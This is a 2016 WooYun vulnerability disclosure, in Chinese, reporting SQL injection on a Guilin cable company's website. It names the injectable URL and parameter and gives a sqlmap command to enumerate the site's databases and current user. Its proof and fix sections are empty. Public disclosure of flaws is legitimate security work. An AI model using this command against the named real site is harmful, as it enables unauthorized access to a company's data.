桂林国际电线电缆集团有限责任公司SQL注入

漏洞概要 关注数(0) 关注此漏洞

缺陷编号： WooYun-2016-188229

漏洞标题： 桂林国际电线电缆集团有限责任公司SQL注入

相关厂商： 桂林国际电线电缆集团有限责任公司

漏洞作者： 路人甲

提交时间： 2016-03-24 17:00

公开时间： 2016-05-08 17:00

漏洞类型： SQL注射漏洞

危害等级： 中

自评Rank： 6

漏洞状态： 未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

0人收藏

漏洞详情

披露状态：

2016-03-24： 积极联系厂商并且等待厂商认领中，细节不对外公开
2016-05-08： 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

桂林国际电线电缆集团有限责任公司主页存在SQL注入漏洞

详细说明：

注入点：www.guilincable.com/company.asp?id=2
 
 注入参数：id
 
 Sqlmap注入命令：sqlmap -u www.guilincable.com/company.asp?id=2 --dbs --current-user

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应